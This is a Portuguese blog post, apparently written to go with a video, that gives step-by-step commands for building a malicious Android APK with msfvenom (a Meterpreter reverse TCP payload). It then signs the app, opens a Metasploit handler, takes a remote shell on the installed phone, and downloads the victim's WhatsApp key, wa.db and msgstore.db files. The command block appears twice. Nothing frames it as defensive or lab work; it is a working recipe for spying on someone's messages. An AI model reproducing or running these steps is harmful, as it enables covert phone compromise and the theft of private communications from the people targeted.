How to create a apk on Windows using metasploit and extract WhatsApp databases.
O vídeo abaixo explica como instalar e configurar o Metasploit no Windows 10 para posteriormente utilizar do comando msfvenom para criar um app malicioso para conectar-se remotamente ao Android após instalado. Assim que a conexão for efetivada, é possível explorar o sistema de arquivos do Android para baixar os arquivos key, wa.db e msgstore.db do WhatsApp remotamente.
Se o vídeo acima não carregar, assista clicando aqui!
Tudo isso é possível graças a função WSL (Subsistema Windows para Linux) que permite rodar ferramentas, arquivos, para Linux no Windows. Portanto no vídeo é instalado o sistema operacional Kali Linux no Windows utilizando o WSL.
[post_ads]
Principais comandos:
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install metasploit-framework
msfvenom -p android/meterpreter/reverse_tcp LHOST=seu_ip LPORT=4444 R > nome_qualquer.apk
sudo apt-get install openjdk-8-jdk
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore nome_do_apk.apk alias_name
sudo apt-get install zipalign
zipalign -v 4 nomeapk.apk novonome.apk
ifconfig
msfconsole
use exploit/multi/handler
[post_ads]
Principais comandos:
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install metasploit-framework
msfvenom -p android/meterpreter/reverse_tcp LHOST=seu_ip LPORT=4444 R > nome_qualquer.apk
sudo apt-get install openjdk-8-jdk
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore nome_do_apk.apk alias_name
sudo apt-get install zipalign
zipalign -v 4 nomeapk.apk novonome.apk
ifconfig
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST seu_ip_local
set LPORT 4444
exploit
shell
set LHOST seu_ip_local
set LPORT 4444
exploit
shell
[post_ads_2]
Conteúdos citados durante o vídeo:
- Principais comandos de terminal
- Como embutir payload em apk, clique aqui e confira.
- Como visualizar conteúdo do msgstore.db, clique aqui e confira.
COMENTÁRIOS